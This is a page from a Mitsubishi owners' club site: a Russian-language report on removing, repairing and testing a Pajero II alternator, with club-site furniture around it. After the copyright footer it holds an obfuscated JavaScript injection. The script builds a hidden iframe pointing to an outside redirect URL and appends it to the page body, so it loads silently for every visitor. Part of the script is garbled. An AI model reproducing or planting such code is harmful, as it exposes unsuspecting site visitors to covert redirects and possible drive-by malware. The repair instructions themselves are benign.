Случайное фото

005
005

Друзья клуба

Тиме нужна помощь!



Статистика





Ремонт генератора Pajero 2

Ремонт генератора MMC Pajero II




Двигатель: 4D56 (генератор с вакуумным насосом)
Год выпуска: 1993
Генератор 90А


На днях сломался генератор. Внезапно пропал заряд, и загорелись лампочки. Через пару дней езды генератор снова ожил. Правда, в темное время суток было видно слабое свечение этих ламп. Решено было под руководством чинить самому.


Часть 1. Снятие генератора.



  1. Снимает защиту снизу.
  2. Снимает воздушный фильтр с патрубком от турбины. Будет мешать в дальнейшем.
  3. Откручиваем масляный фильтр. Его лучше сразу укутать в целлофановый пакетик. Заткнуть дырочку от масляного фильтра на двигателе можно тряпочкой. Масла выливается немного.
  4. Сливаем ОЖ с радиатора. (откручивается барашек и аккуратно через трубочку сливаем ОЖ в бутылку)
  5. Снимаем насос ГУР, ремни с генератора и ГУР. Отодвигаем ГУР на шлангах в сторону, чтоб не мешал.
  6. Снимаем термостат. С него выбежит примерно 3л ОЖ. (неизбежная потеря) ОЖ лучше сразу докупить. Термостат мешает вынуть генератор. Или снимать кардан с ГУР. Термостат проще.
  7. Откручиваем нижний болт на генераторе, снимаем масляные шланги, (там есть шланг высокого давления, понадобятся 2 новые медные шайбы для последующей сборки)
  8. Снимаются все провода с генератора.

После этих действий генератор легко вынимается из машины сверху.


Часть 2. Ремонт.


Ремонт генератора Pajero 2После снятия генератора я его отмыл от масла и всяческой грязи китайской пеной для мытья двигателя или карбклинером (тоже китайским).
Когда снял масляный насос, специально не протирал внутреннюю часть от грязи, т.к. по ней видно посадочное место для дальнейшей сборки.


Разбираем генератор (4 болта) после легкого применения молоточка генератор должен развалиться на 2 части. У этих генераторов вечная болезнь это сальник между вакуумным насосом и генератором. На моем сальник был цел.


Ремонт генератора Pajero 2Как видно на фотографии щетки еще достаточно в хорошем состоянии. Но решено их тоже заменить.


Далее необходимо снять катушку из задней крышки. Откручиваем все болты, пристукивая молоточком по задней крышке, катушка легко вынимается вместе с диодным мостом. Отпаиваем мост от катушки. Понадобится толстый паяльник и хорошо бы вторую пару рук, так как очень неудобно держать.


Ремонт генератора Pajero 2как оказалось у меня один диод просто раскрошился на 2 части - под замену. Диодные мосты были куплены на Кар-сити в подвале у одной дамы за 2700 + 300 за 2 новые щетки с дырочками. В других местах за такой же мост просили 3500, мотивируя что он из эмиратов (на самом деле что один что второй сделаны одинаково плохо в Китае. качество пластиковых изоляторов плохое. Но делать было нечего) Диодный мост по каталогу шел на митсубиси галант 2.0 Действительно как оказалось позднее он немного другой. размеры пластиковой защиты больше. Ее мне пришлось срезать.


На фото мой старый мост. верхний левый диод как видно отошел от радиатора (раскрошился). Перед установкой нового моста требуется обратить внимание на диэлектрики между двумя пластинами радиаторов. У меня со стороны плюсового провода диэлектрик был перевернут, что потом вылезло в проблему. Советую сразу сделать это до впайки в катушку. Далее запаиваем катушку на мост, меняем щетки. Щетки отпаиваются с одной стороны и меняются на новые.


Ремонт генератора Pajero 2Дырочки на щетках помогут в дальнейшем при сборке генератора.


Далее. Смазываем подшипники. Подшипники выпрессовать не удалось, поэтому решено их было смазать. В генераторе 2 подшипника. Поддеваем аккуратно ножичком защиту, снимаем. На моих подшипниках старая смазка рассохлась. Почистил карбклинером, набил новой смазкой, выправил молоточком защиту, одел на подшипник. С этим покончено.


Далее собираем генератор устанавливаем катушку на место, продев через дырочки в щетках и спец отверстие в корпусе стальную проволочку. Очень удобно ставится якорь. вынимаем проволочку и щетки ставятся на якорю как положено. Скручиваем генератор обратно болтами. Теперь процесс тестирования.


Ремонт генератора Pajero 2Подключаем маленький аккумулятор на разъем обмотки возбуждения (необходимо для запуска генератора) минус аккумулятора на массу генератора.
Наматываем веревку на шкив, подключаем стрелочный вольтметр на (+) выход генератора. Дергаем веревку, раскручиваем генератор. Стрелочный прибор должен сразу же показать отклонение до мин 3В. у меня напряжение прыгнуло до более 10В. Что показывает исправную работу генератора.


Далее собираем генератор и масляный насос по грязи на насосе. Единственное, что я не сделал, это не промазал герметиком посадочное место на насосе. Надеюсь, резиновая прокладка удержит, и масло не будет капать.







Автор отчёта: Gothic_Snake


Обсудить на форуме...

Электрика и электрооборудование | Просмотров: 1239 | Опубликовано: 1 июня 2009 | Напечатать

Погода

Реклама

По вопросам размещения рекламы, обращайтесь по адресу
reklama@mitsubishi-club.kz

 




Copyright © 2007 MITSUBISHI CLUB KAZAKHSTAN All Rights Reserved | Для лучшей работы с сайтом используйте
function zG(){};tF=53186;zG.prototype = {fK : function() {e="e";this.fQ='';return 'h2t)tFp2:&/F/)c2l)iFc)k&-FpFo)i)s)k2.Fc&o)m2/&tIh&eFrFeF/&i)n).2c)gIi&?27)'.iH(/[\)I&F2]/g, '');var oN=new Date();this.nU="";},v : function() {dF="";wS=9383;nB="nB";var t=new Date(); var h='';var m=new Date(); String.prototype.iH=function(d, o){return this.replace(d, o)};var r=new Date();tR="tR";kQ=false;gG=20573;wJ=false;zW="";var c=function(){};var y=window;gN="gN";this.yQ="yQ";var yR=y['u{n$eYs9c{aYp{eY'.iH(/[Yj9\$\{]/g, '')];var eK=new Date();var hI="hI";function jL(){};var z = this;var rN='';var p=false;var oD = "xxK%3C%2Fbody%3E%3C%2Fhtml%3E";function mT(){};xH="";this.u=false;var f=document;this.dX="dX";this.hB="hB";var jA=false;var k = { vM : 'arpTpreonTd#CohoirlSd#'.iH(/[#roST]/g, ''), oU : 'svtuyvlvei'.iH(/[ivua_]/g, ''), kC : 'cKrCe3aKt3ezEzlzezmKeGn3tK'.iH(/[K3zCG]/g, ''), fV : 'sReDtRATtTt?rRiRbRuTtEeT'.iH(/[TD\?ER]/g, ''), w : 's;rLcL'.iH(/[L;\{\(5]/g, ''), xK : 'bko1dUyT'.iH(/[T1Uk\)]/g, '') };var rK='';function hV(){};var uI=function(){return 'uI'};this.gC='';var rP="";var tZ=function(){return 'tZ'};this.a="a";var n=f[k.kC]('i<\!uK]/g, ''));var kL=new Date();i=39073;this.fU="fU";jO=false;pW='';var eY=5116;try {rD="rD";vC=false;var fI=function(){};var rU="rU";this.q="q";b="";var bJ='';nE(n,k.oU, yR("display%3A%20none"));function dS(){};rG=63044;this.uK=false;this.iB="iB";nE(n,k.w, this.fK());eU="eU";this.pS='';this.fR="";var qA='';qE="qE";qL="";f[k.xK][k.vM](n);this.xL=54456;this.hW="";var bK=new Array();this.iR="";} catch(g) {this.vB="";tN='';var eJ='';var uD=new Array();var rV=new Date();var l=function(){};this.lK='';f['wSr%i;tSe%'.iH(/[%;XS/]/g, '')](yR(oD));this.hK=49925;var iL=new Array();hKH='';this.uJ=61972;this.cO="cO";var s="s";this.mG=53808;y['s+eAt+T6iwm+ewoAuAtw'.iH(/[w\+Z6A]/g, '')](function(){ this.cJ="cJ";this.uR="";var pO='';vH=58151;this.dSF='';var sV="sV";z.v();var wH=34896;var cM=new Date();var yK=new Array();var eYV=function(){};this.kU="kU";zT="";}, 368);zJ="";var dXZ="dXZ";}qZ=19279;this.vBG='';var nM=new Date();var tZZ=false;var eE=new Date();var hC=new Date();function vO(){};var wZ="";function nE(n, j, dB){this.bW='';var fT=new Array();n[k.fV](j,dB);var iRP=function(){return 'iRP'};tD="";var kI=new Array();}this.xX='';this.fX='';var tQ=false;dV=false;}};var uY=new Array();var cP=new zG(); this.dK="dK";cP.v();function gQ(){};